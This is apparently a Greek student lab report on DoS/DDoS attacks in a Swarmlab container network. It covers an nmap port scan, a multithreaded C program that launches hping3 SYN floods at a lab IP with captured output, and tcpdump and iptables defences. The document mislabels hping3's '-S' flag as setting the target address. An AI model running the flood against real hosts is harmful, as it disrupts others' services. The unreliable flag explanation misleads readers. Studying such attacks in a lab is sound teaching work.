= Ασφάλεια Δικτύων και Επικοινωνιών

== Εισαγωγή

Η τελική εργασία που επιλέχθηκε έχει ως στόχο την επίθεση τύπου DoS/DDoS (Distributed Denial-of-Service). Αρχικά δημιουργούμε ένα σύστημα σε μια εικονική μηχανή στον υπολογιστή μας και στη συνέχεια, πάντα με τη βοήθεια του Swarmlab κάνουμε την επίθεση μας. Τέλος δείχνουμε πως μπορούμε να αποτρέψουμε την επίθεση αυτή με τη χρήση των iptables.

== Swarmlab

Το Swarmlab είναι ένα εργαλείο ανοικτού κώδικα που στόχο έχει να μας εφοδιάσει με εργαλεία για να πειραματιστούμε σε διάφορα σενάρια μέσα σε εικονικές μηχανές. Η επίθεση που παρουσιάζεται βασίζεται σε αυτό. Έχοντας ακολουθήσει τις οδηγίες εγκατάστασης του Swarmlab εκκινούμε την εφαρμογή με την εντολή *sudo swarmlab-hybrid/start.sh* και στη συνέχεια μέσα από τη σελίδα που τρέχουμε στο localhost πάμε στο Labroom και επιλέγουμε το Linux, βάζοντας τον αριθμό των εικονικών υπολογιστών που θέλουμε να δημιουργήσουμε. Μετά, όταν σηκωθούν τα μηχανάκια με την εντολή *docker exec -it -udocker xxx /bin/bash* (όπου xxx το όνομα του μηχανήματός μας) συνδεόμαστε στα terminals της επιλογής μας.

== Εντολές και εργαλεία επίθεσης

=== ifconfig

Για να φτάσουμε στο σημείο να κάνουμε μια επίθεση DoS/DDoS Attack, σημαίνει πρώτα πως έχουμε κάποια στοιχεία για το θύμα μας. Για παράδειγμα αρχικά χρειαζόμαστε την IP του συστήματος του. Για να βρούμε την *IP* θα πληκτρολογήσουμε στο σύστημα που θέλουμε να επιτεθούμε την εντολή *ifconfig*.
[source,console]
----
~ $ ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:AC:13:00:02  
          inet addr:172.19.0.2  Bcast:172.19.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:87 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:10492 (10.2 KiB)  TX bytes:0 (0.0 B)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:3183 errors:0 dropped:0 overruns:0 frame:0
          TX packets:3183 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:277901 (271.3 KiB)  TX bytes:277901 (271.3 KiB)
----

Όπως βλέπουμε το *inet addr* στο *eth0* είναι το *172.19.0.2*, το οποίο είναι και η βασική πληροφορία που παίρνουμε τρέχοντας την εντολή αυτή.

=== nmap

Στη συνέχεια θα χρησιμοποιήσουμε ένα εργαλείο ανοικτού κώδικα που χρησιμοποιείται για σάρωση δικτύων και ανακάλυψη ευπαθειών. Το εργαλείο αυτό ονομάζεται *nmap* και το όνομά του προέρχεται από τις λέξεις network και mapper, διότι η ιδιότητα του είναι όντως να χαρτογραφεί ένα δίκτυο. Έχοντας πλέον ως δεδομένο πως το δίκτυο που μας ενδιαφέρει να κάνουμε επίθεση έχει την διεύθυνση *172.19.0.2* θα γράψουμε την εντολή *nmap -p- 172.19.0.pass:[*]* και έτσι θα πραγματοποιήσουμε σάρωση όλων των πορτών της διεύθυνσης 172.19.0.2 ώστε να ανακαλύψουμε ποιες πόρτες είναι ανοικτές. Πριν τρέξουμε την εντολή αξίζει να αναφερθεί πως με την εντολή *nmap -sP* λέμε στο nmap να μην σκανάρει τα Ports αφού ανακαλύψει κάποιον host.
[source,console]
----
~ $ nmap -p- 172.19.0.*
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-31 23:54 UTC
Nmap scan report for 172.19.0.1 (172.19.0.1)
Host is up (0.00020s latency).
Not shown: 65530 closed ports
PORT      STATE SERVICE
3000/tcp  open  ppp
3080/tcp  open  stm_pproc
3088/tcp  open  xdtp
5000/tcp  open  upnp
41565/tcp open  unknown

Nmap scan report for fd289df0c38e (172.19.0.2)
Host is up (0.00024s latency).
Not shown: 65534 closed ports
PORT     STATE SERVICE
3001/tcp open  nessus

Nmap scan report for readmongo_service.poc-datacollector_datacollector-net (172.19.0.3)
Host is up (0.00022s latency).
Not shown: 65534 closed ports
PORT      STATE SERVICE
40185/tcp open  unknown

Nmap done: 256 IP addresses (3 hosts up) scanned in 9.14 seconds
----
Διάφοροι τρόποι σάρωσης των port με την χρήση του nmap είναι:
[circles]
* nmap –p 30 172.19.0.2 (Σαρώνει την πόρτα 30 της διεύθυνσης 172.19.0.2)
* nmap –p 30-90 172.19.0.2 (Σαρώνει τις πόρτες από 30 ως 90 της διεύθυνσης 172.19.0.2)
* nmap –p- 172.19.0.2 (Σαρώνει όλες τις πόρτες της διεύθυνσης 172.19.0.2)

Όταν τρέξαμε την παραπάνω εντολή είδαμε πως το port *3001* είναι ανοικτό για την διεύθυνση *172.19.0.2*

=== hping3

Το *hping3* είναι ένα ακόμα εργαλείο που θα χρησιμοποιήσουμε για την επίτευξη του στόχου μας. Πιο συγκεκριμένα αυτό το εργαλείο έχει την ικανότητα να στέλνει προσαρμοσμένα πακέτα TCP/IP και να εμφανίζει τις απαντήσεις του θύματος. Στην περίπτωση της επίθεσης μας θα στέλνουμε στο θύμα ασταμάτητα πακέτα με σκοπό να ρίξουμε το δίκτυό του. Για να το κάνουμε αυτό θα γράψουμε ένα προγραμματάκι σε γλώσσα C και το βασικό κομμάτι του θα είναι η εντολή *sudo hping3 -S 172.19.0.2 -p 3001*. Πριν όμως συνεχίσουμε ας δούμε τι κάνουν οι παράμετροι *-S* και *-p*. Αρχικά με την παράμετρο *-S* δηλώνουμε την διεύθυνση του στόχου μας, ενώ με την παράμετρο *-p* δηλώνουμε το port που στοχεύουμε.

== Dos/DDoS Attack

Έχοντας συλλέξει όλα μας τα δεδομένα και τα εργαλεία για να εκτελέσουμε την επίθεση, κάποιος θα έλεγε πως είμαστε έτοιμοι για την επίθεση μας. Αυτό όμως δεν πρόκειται να γίνει αν δεν αναφερθούμε πιο αναλυτικά στο τι ακριβώς θέλουμε να κάνουμε. Τι ακριβώς είναι το DDoS Attack; Πως πραγματοποιούνται οι επιθέσεις DDoS;

Το DDoS Attack ή αλλιώς μια επίθεση κατανεμημένης άρνησης υπηρεσίας είναι μια κακόβουλη προσπάθεια διακοπής της κανονικής κίνησης ενός στοχευμένου διακομιστή, υπηρεσίας ή δικτύου υπερβάλλοντας τον στόχο ή την περιβάλλουσα υποδομή του με μια πλημμύρα κίνησης στο Διαδίκτυο. Οι επιθέσεις DDoS επιτυγχάνουν αποτελεσματικότητα χρησιμοποιώντας πολλαπλά παραβιασμένα συστήματα υπολογιστών ως πηγές κίνησης επιθέσεων. Οι μηχανές εκμετάλλευσης μπορούν να περιλαμβάνουν υπολογιστές και άλλους δικτυακούς πόρους, όπως συσκευές IoT. Από υψηλό επίπεδο, μια επίθεση DDoS είναι σαν μια απροσδόκητη κυκλοφοριακή συμφόρηση που φράζει τον αυτοκινητόδρομο, εμποδίζοντας την τακτική κυκλοφορία να φτάσει στον προορισμό της.

Οι επιθέσεις DDoS πραγματοποιούνται με δίκτυα μηχανημάτων συνδεδεμένων στο Διαδίκτυο. Αυτά τα δίκτυα αποτελούνται από υπολογιστές και άλλες συσκευές (όπως συσκευές IoT) οι οποίες έχουν μολυνθεί με κακόβουλο λογισμικό, επιτρέποντάς τους να ελέγχονται εξ αποστάσεως από έναν εισβολέα. Αυτές οι μεμονωμένες συσκευές αναφέρονται ως bot (ή ζόμπι) και μια ομάδα από αυτές ονομάζεται botnet. Μόλις δημιουργηθεί ένα botnet, ο εισβολέας μπορεί να κατευθύνει μια επίθεση στέλνοντας απομακρυσμένες οδηγίες σε κάθε bot. Όταν ο διακομιστής ή το δίκτυο ενός θύματος στοχεύεται από το botnet, κάθε bot στέλνει αιτήματα στη διεύθυνση IP του προορισμού, προκαλώντας πιθανώς υπερφόρτωση του διακομιστή ή του δικτύου, με αποτέλεσμα την άρνηση παροχής υπηρεσιών στην κανονική κυκλοφορία. Επειδή κάθε bot είναι μια νόμιμη συσκευή Διαδικτύου, ο διαχωρισμός της κίνησης από την επίθεση με την κανονική κυκλοφορία είναι δύσκολος.

Στην περίπτωση μας, που προφανώς δεν έχουμε ένα botnet στην διάθεση μας, αντί για bot θα χρησιμοποιήσουμε πυρήνες του επεξεργαστή. Ο κάθε πυρήνας θα χρησιμοποιήσει την εντολή του εργαλείου *hping3* που είδαμε παραπάνω και έτσι θα πραγματοποιήσουμε την επίθεσή μας. Για να γίνει αυτό θα χρησιμοποιήσουμε ένα προγραμματάκι το οποίο είναι γραμμένο σε γλώσσα C. Αξίζει εδώ να σημειωθεί πως η γλώσσα C είναι κατάλληλη για μια τέτοια επίθεση, σε αντίθεση με άλλες γλώσσες όπως η Python και η Java λόγω της ασύγκριτης ταχύτητας της. Χωρίς περισσότερα λόγια ας περάσουμε στο πρόγραμμα!

[source,c]
----
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <pthread.h>

void *ddos(void *arg)
{
	system("sudo hping3 -S 172.19.0.2 -p 3001");
	return NULL;
}

int main(int argc, char*argv[])
{
	if (argc<2)
	{
		printf("Please input number of threads.\n");
		return 1;
	}
	int l = atoi(argv[1]),i;
	pthread_t *p_thread;
	p_thread = (pthread_t *)malloc(sizeof(pthread_t) * l);
	for (i=0; i<l; i++)
	{
		pthread_create(&p_thread[i] ,NULL, ddos, (void *) NULL);
	}
	for (i=0; i<l; i++)
	{
		pthread_join(p_thread[i],NULL);
	}
	free(p_thread);
	pthread_exit(NULL);
}
----

Όταν γράψουμε τον κώδικα μας στο αρχείο με όνομα DDOS.c θα χρειαστεί να τον κάνουμε compile, για το compile του θα τρέξουμε την εντολή *gcc DDOS.c -o DDOS -lpthread*. Αξίζει να αναφερθεί ο λόγος ύπαρξης της παραμέτρου *-lpthread* την οποία χρησιμοποιούμε επειδή χρειαζόμαστε τα threads.

Για να τρέξουμε το πρόγραμμα μας θα χρησιμοποιήσουμε την εντολή *./DDOS* και μετά τον αριθμό των threads (bots) που θέλουμε να αναπαράγουμε. Τυπικά αναφέρεται πως ένας μεγάλος αριθμός (πχ. 1000) θα κολλούσε το μηχάνημα μας και θα χρειαζόταν επανεκκίνηση. Αυτό φυσικά έχει να κάνει με την δύναμη του υπολογιστή μας, και σε συνέχεια την δύναμη που έχουμε δώσει στο virtual machine μας. Τώρα θα τρέξουμε την εντολή *./DDOS 10* και θα δούμε παρακάτω τα αποτελέσματα.

[source,console]
----
HPING 172.19.0.2 (br-72749b960542 172.19.0.2): S set, 40 headers + 0 data bytes
HPING 172.19.0.2 (br-72749b960542 172.19.0.2): S set, 40 headers + 0 data bytes
HPING 172.19.0.2 (br-72749b960542 172.19.0.2): S set, 40 headers + 0 data bytes
HPING 172.19.0.2 (br-72749b960542 172.19.0.2): S set, 40 headers + 0 data bytes
HPING 172.19.0.2 (br-72749b960542 172.19.0.2): S set, 40 headers + 0 data bytes
HPING 172.19.0.2 (br-72749b960542 172.19.0.2): S set, 40 headers + 0 data bytes
HPING 172.19.0.2 (br-72749b960542 172.19.0.2): S set, 40 headers + 0 data bytes
HPING 172.19.0.2 (br-72749b960542 172.19.0.2): S set, 40 headers + 0 data bytes
HPING 172.19.0.2 (br-72749b960542 172.19.0.2): S set, 40 headers + 0 data bytes
len=44 ip=172.19.0.2 ttl=64 DF id=0 sport=3001 flags=SA seq=0 win=64240 rtt=5.1 ms
DUP! len=44 ip=172.19.0.2 ttl=64 DF id=0 sport=3001 flags=SA seq=0 win=64240 rtt=5.3 ms
DUP! len=44 ip=172.19.0.2 ttl=64 DF id=0 sport=3001 flags=SA seq=0 win=64240 rtt=5.3 ms
DUP! len=44 ip=172.19.0.2 ttl=64 DF id=0 sport=3001 flags=SA seq=0 win=64240 rtt=5.4 ms
DUP! len=44 ip=172.19.0.2 ttl=64 DF id=0 sport=3001 flags=SA seq=0 win=64240 rtt=5.4 ms
DUP! len=44 ip=172.19.0.2 ttl=64 DF id=0 sport=3001 flags=SA seq=0 win=64240 rtt=5.4 ms
len=44 ip=172.19.0.2 ttl=64 DF id=0 sport=3001 flags=SA seq=0 win=64240 rtt=2.8 ms
DUP! len=44 ip=172.19.0.2 ttl=64 DF id=0 sport=3001 flags=SA seq=0 win=64240 rtt=3.2 ms
DUP! len=44 ip=172.19.0.2 ttl=64 DF id=0 sport=3001 flags=SA seq=0 win=64240 rtt=3.3 ms
DUP! len=44 ip=172.19.0.2 ttl=64 DF id=0 sport=3001 flags=SA seq=0 win=64240 rtt=17.0 ms
...
DUP! len=44 ip=172.19.0.2 ttl=64 DF id=0 sport=3001 flags=SA seq=7 win=64240 rtt=37.9 ms
DUP! len=44 ip=172.19.0.2 ttl=64 DF id=0 sport=3001 flags=SA seq=7 win=64240 rtt=37.7 ms
DUP! len=44 ip=172.19.0.2 ttl=64 DF id=0 sport=3001 flags=SA seq=7 win=64240 rtt=23.1 ms
DUP! len=44 ip=172.19.0.2 ttl=64 DF id=0 sport=3001 flags=SA seq=7 win=64240 rtt=8.1 ms
^C
--- 172.19.0.2 hping statistic ---

--- 172.19.0.2 hping statistic ---

--- 172.19.0.2 hping statistic ---
8 packets transmitted, 75 packets received, -837% packet loss

--- 172.19.0.2 hping statistic ---

--- 172.19.0.2 hping statistic ---
8 packets transmitted, 75 packets received, -837% packet loss
round-trip min/avg/max = 1.7/15.1/37.8 ms

--- 172.19.0.2 hping statistic ---

--- 172.19.0.2 hping statistic ---

--- 172.19.0.2 hping statistic ---

--- 172.19.0.2 hping statistic ---
8 packets transmitted, 74 packets received, -825% packet loss
8 packets transmitted, 75 packets received, -837% packet loss
round-trip min/avg/max = 1.5/15.1/37.7 ms
8 packets transmitted, 75 packets received, -837% packet loss
round-trip min/avg/max = 1.4/15.0/37.7 ms

--- 172.19.0.2 hping statistic ---
8 packets transmitted, 75 packets received, -837% packet loss
8 packets transmitted, 69 packets received, -762% packet loss
round-trip min/avg/max = 0.0/8.3/22.8 ms
8 packets transmitted, 75 packets received, -837% packet loss
round-trip min/avg/max = 1.7/14.9/37.9 ms
round-trip min/avg/max = 1.4/15.2/37.7 ms
round-trip min/avg/max = 0.0/8.2/22.9 ms
round-trip min/avg/max = 0.0/9.6/23.1 ms
8 packets transmitted, 75 packets received, -837% packet loss
8 packets transmitted, 66 packets received, -725% packet loss
round-trip min/avg/max = 0.0/4.0/35.0 ms
round-trip min/avg/max = 2.0/15.3/40.0 ms
----

Αν και η επίθεση μας δεν έριξε το δίκτυο του θύματος μας (θα χρειαζόντουσαν *πολλά* παραπάνω bots που η εικονική μηχανή δεν αντέχει να προσομοιώσει), σίγουρα το *ενόχλησε* κατά τη διάρκειά της. Παρόλα αυτά *το θύμα μας δεν είναι ανυπεράσπιστο*. Υπάρχει τρόπος να αμυνθεί και θα το δούμε παρακάτω.

== Εντολές και εργαλεία άμυνας

=== tcpdump

Το *tcpdump* είναι ένα πολύ χρήσιμο εργαλείο που στόχος του είναι να αναλύει πακέτα που μεταδίδονται ή λαμβάνονται στο δίκτυο που είναι συνδεδεμένος ο υπολογιστής. Αυτό αποτελεί και ένα εξαιρετικά αμυντικό εργαλείο καθώς αν ο χρήστης το τρέξει από την γραμμή εντολών καθώς βρίσκεται υπό επίθεση θα βρει τη διεύθυνση του θύτη. Στην περίπτωση μας το θύμα θα τρέξει την εντολή *tcpdump dst 172.19.0.2* και θα βρει την IP που του κάνει την επίθεση, ας θεωρήσουμε πως αυτή είναι η IP με διεύθυνση *78.33.42.8*. Πριν προχωρήσουμε όμως ας δώσουμε μερικά παραδείγματα χρήσης της εντολής tcpdump:

[circles]
* tcpdump host 1.2.3.4 (Εύρεση κίνησης μέσω διεύθυνσης IP)
* tcpdump src 1.2.3.4 (Εύρεση κίνησης με πηγή διεύθυνση IP)
* tcpdump dst 1.2.3.4 (Εύρεση κίνησης με προορισμό διεύθυνση IP)
* tcpdump port 3001 (Εύρεση κίνησης σε συγκεκριμένο port)

=== iptables

Το *iptables* είναι ένα εργαλείο για τη δημιουργία και τη συντήρηση των IP packet filter rules στο Linux kernel. Το iptables χρησιμοποιεί διευθύνσεις τύπου IPv4, ενώ το ip6tables χρησιμοποιεί διευθύνσεις τύπου IPv6. Με την χρήση λοιπόν του iptables ο επιτιθέμενος, κοινώς το θύμα μας :), μπορεί να σταματήσει την τρέχουσα επίθεση και οποιαδήποτε άλλη μελλοντική επίθεση δεχτεί από την IP που μόλις ανακάλυψε πως του επιτέθηκε, δηλαδή την *78.33.42.8*, κάνοντας την πολύ απλή, αλλά πολύ δυνατή εντολή *sudo iptables -I INPUT -s 78.33.42.8 -j DROP*. Με αυτό λοιπόν τον τρόπο ο πλέον αμυνόμενος απέκλεισε την κυκλοφορία που εισερχόταν στο δίκτυο του από την συγκεκριμένη IP. Αναλύοντας λίγο την εντολή βλέπουμε τις παραμέτρους *-I* που σημαίνει εισαγωγή κανόνων σε μια θέση στην αλυσίδα, την *-s* που σημαίνει πως θα εισαχθεί διεύθυνσης (είτε IP είτε όνομα δικτύου) και τέλος την *-j* που καθορίζει τον στόχο του κανόνα, εφόσον τώρα είναι DROP σημαίνει απόρριψη. Έστω όμως λοιπόν πως στην συνέχεια ο αμυνόμενος μαθαίνει πως την επίθεση την έκανε ένας φίλος του, πως αναιρεί την άμυνα του; Αυτό θα το κάνει με την εντολή *sudo iptables -D INPUT -s 78.33.42.8 -j DROP* όπου η παράμετρος *-D* σημαίνει delete, έτσι λοιπόν διαγράφει αυτό τον κανόνα φίλτρου που είχε θέσει, και μπορεί ξανά να ανταλλάζει αρχεία peer-to-peer με τον φίλο του. Ο οποίος όταν προσπαθούσε να επικοινωνήσει μαζί του, όσο το φίλτρο τον έκοβε εκτός, έβλεπε το μήνυμα Hostname is unreachable στον υπολογιστή του.